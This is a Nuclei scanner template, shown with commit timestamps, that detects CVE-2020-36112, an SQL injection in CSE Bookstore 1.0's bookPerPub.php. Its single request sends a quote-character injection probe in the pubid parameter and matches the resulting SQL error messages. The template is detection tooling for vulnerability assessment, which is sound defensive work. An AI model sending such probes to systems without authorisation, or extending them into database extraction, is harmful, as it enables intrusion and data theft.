nuclei-templates/http/cves/2020/CVE-2020-36112.yaml

43 lines
1.6 KiB
YAML
Raw Normal View History

2021-05-18 22:56:54 +00:00
id: CVE-2020-36112
info:
name: CSE Bookstore 1.0 - SQL Injection
2021-05-18 22:56:54 +00:00
author: geeknik
severity: critical
description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database.
2023-09-06 12:22:36 +00:00
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://www.exploit-db.com/exploits/49314
- https://www.tenable.com/cve/CVE-2020-36112
- https://nvd.nist.gov/vuln/detail/CVE-2020-36112
- https://github.com/StarCrossPortal/scalpel
- https://github.com/anonymous364872/Rapier_Tool
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-36112
cwe-id: CWE-89
2024-05-31 19:23:20 +00:00
epss-score: 0.40486
epss-percentile: 0.97275
2023-09-06 12:22:36 +00:00
cpe: cpe:2.3:a:cse_bookstore_project:cse_bookstore:1.0:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: cse_bookstore_project
product: cse_bookstore
2023-12-05 09:50:33 +00:00
tags: cve,cve2020,sqli,cse,edb,tenable,cse_bookstore_project
2021-05-18 22:56:54 +00:00
http:
2021-05-18 22:56:54 +00:00
- raw:
- |
GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "get book price failed! You have an error in your SQL syntax"
- "Can't retrieve data You have an error in your SQL syntax"
condition: or
# digest: 490a0046304402203616fb072b4db2eab9fa478e6dc3f3035f1206cc86adce846dac33d3aca8ec86022007f79e0e1a6b2c0165aeae26da3dc9bd658a410613cfbae403f02293e8cb4c09:922c64590222798bb761d5b6d8e72950